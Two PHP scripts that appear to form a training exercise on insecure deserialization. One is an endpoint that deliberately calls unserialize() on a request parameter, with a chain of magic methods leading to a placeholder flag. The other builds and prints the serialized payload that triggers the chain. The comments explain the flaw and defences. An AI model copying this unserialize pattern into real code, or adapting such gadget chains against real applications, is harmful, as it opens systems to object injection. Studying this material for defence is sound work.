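<?php
/**
 * Training sample: insecure deserialization reachable through PHP magic methods.
 *
 * The script hands a request parameter directly to unserialize(). None of the
 * classes below has a constructor, so every property value comes from whoever
 * supplied the serialized string. The magic methods form a chain in which each
 * one dereferences, calls, or stringifies a property of its own object:
 *
 *   start_gg::__destruct -> Call::test1 -> funct::__call -> func::__invoke
 *     -> string1::__toString -> GetFlag::get_flag
 *
 * Defensive reading: no single method here looks dangerous in isolation; the
 * risk comes from letting untrusted data pick the object graph they operate on.
 */

/**
 * Chain entry point: the destructor runs automatically when the object is freed.
 */
class start_gg
{
    public $mod1;
    public $mod2;

    /**
     * Calls test1() on whatever $mod1 holds; no type or null check is made.
     */
    public function __destruct()
    {
        $this->mod1->test1();
    }
}

/**
 * Forwards test1() to a test2() call on its own $mod1.
 */
class Call
{
    public $mod1;
    public $mod2;

    /**
     * Invokes test2() on $mod1. If that object has no test2() method but does
     * define __call(), PHP dispatches to __call() instead.
     */
    public function test1()
    {
        $this->mod1->test2();
    }
}

/**
 * Catches calls to undefined methods and invokes $mod1 as a callable.
 */
class funct
{
    public $mod1;
    public $mod2;

    /**
     * @param string $test2 Name of the method that was called (unused).
     * @param array  $arr   Arguments of that call (unused).
     */
    public function __call($test2, $arr)
    {
        // Calling the property value as a function triggers __invoke() when
        // $mod1 is an object that defines it.
        $callable = $this->mod1;
        $callable();
    }
}

/**
 * Invokable object whose body concatenates $mod1 into a string.
 */
class func
{
    public $mod1;
    public $mod2;

    /**
     * String concatenation converts $mod1 to a string, which triggers
     * __toString() when $mod1 is an object that defines it.
     * The literal is Chinese for "string concatenation".
     */
    public function __invoke()
    {
        $this->mod2 = "字符串拼接" . $this->mod1;
    }
}

/**
 * Stringifiable object that calls get_flag() on $str1 while being converted.
 */
class string1
{
    public $str1;
    public $str2;

    /**
     * @return string Always "1"; the call to get_flag() is a side effect.
     */
    public function __toString()
    {
        $this->str1->get_flag();

        return "1";
    }
}

/**
 * End of the chain: prints the (placeholder) flag value.
 */
class GetFlag
{
    public function get_flag()
    {
        echo "flag:" . "xxxxxxxxxxxx";
    }
}

// A missing parameter is treated as an empty string, for which unserialize()
// simply returns false instead of raising an undefined-index warning.
$a = $_GET['string'] ?? '';

// SECURITY: unserialize() on request data lets the client decide which of the
// classes above are instantiated and what their properties contain; the magic
// methods then run against those values. The return value is discarded, so any
// object created here is destroyed immediately and its __destruct() fires at
// once. This is the intended weakness of the exercise and is left in place.
// Outside a lab, decode untrusted input with json_decode(), or at minimum pass
// ['allowed_classes' => false] as the second argument to unserialize().
unserialize($a);
?>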
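<?php
/**
 * Companion script for the deserialization exercise: builds the nested object
 * graph through constructors and prints its serialized form.
 *
 * Each constructor fills $mod1 / $str1 with the next class in the sequence
 * start_gg -> Call -> funct -> func -> string1 -> GetFlag.
 *
 * Points worth noting when reviewing this from the defensive side:
 *  - serialize() records only class names and property values, never method
 *    bodies. The code that runs on the receiving end is whatever the
 *    deserializing application already defines for those class names.
 *  - unserialize() does not call __construct(), so these constructors matter
 *    only for producing the string in this script.
 *  - $a is still alive when the script ends, so start_gg::__destruct() also
 *    runs here and its output follows the serialized string.
 */

/**
 * Outermost object; holds a Call instance and uses it from the destructor.
 */
class start_gg
{
    public $mod1;
    public $mod2;

    public function __construct()
    {
        $this->mod1 = new Call();
    }

    /**
     * Calls test1() on $mod1 when the object is destroyed.
     */
    public function __destruct()
    {
        $this->mod1->test1();
    }
}

/**
 * Holds a funct instance and calls test2() on it.
 */
class Call
{
    public $mod1;
    public $mod2;

    public function __construct()
    {
        $this->mod1 = new funct();
    }

    /**
     * funct defines no test2(), so this call is routed to funct::__call().
     */
    public function test1()
    {
        $this->mod1->test2();
    }
}

/**
 * Holds a func instance and invokes it from __call().
 */
class funct
{
    public $mod1;
    public $mod2;

    public function __construct()
    {
        $this->mod1 = new func();
    }

    /**
     * @param string $test2 Name of the method that was called (unused).
     * @param array  $arr   Arguments of that call (unused).
     */
    public function __call($test2, $arr)
    {
        // Invoking the object stored in $mod1 reaches func::__invoke().
        $callable = $this->mod1;
        $callable();
    }
}

/**
 * Holds a string1 instance and concatenates it into $mod2 when invoked.
 */
class func
{
    public $mod1;
    public $mod2;

    public function __construct()
    {
        $this->mod1 = new string1();
    }

    /**
     * The concatenation stringifies $mod1 and so reaches string1::__toString().
     * The literal is Chinese for "string concatenation".
     */
    public function __invoke()
    {
        $this->mod2 = "字符串拼接" . $this->mod1;
    }
}

/**
 * Holds a GetFlag instance and calls get_flag() on it during string conversion.
 */
class string1
{
    public $str1;
    public $str2;

    public function __construct()
    {
        $this->str1 = new GetFlag();
    }

    /**
     * @return string Always "1"; the call to get_flag() is a side effect.
     */
    public function __toString()
    {
        $this->str1->get_flag();

        return "1";
    }
}

/**
 * Innermost object: prints the (placeholder) flag value.
 */
class GetFlag
{
    public function get_flag()
    {
        echo "flag:" . "xxxxxxxxxxxx";
    }
}

$a = new start_gg();

// The printed value begins with an object marker of the form O:<len>:"<class>".
// Request parameters carrying that pattern are a useful signal for input
// validation and logging in front of any endpoint that deserializes data.
echo serialize($a);
?>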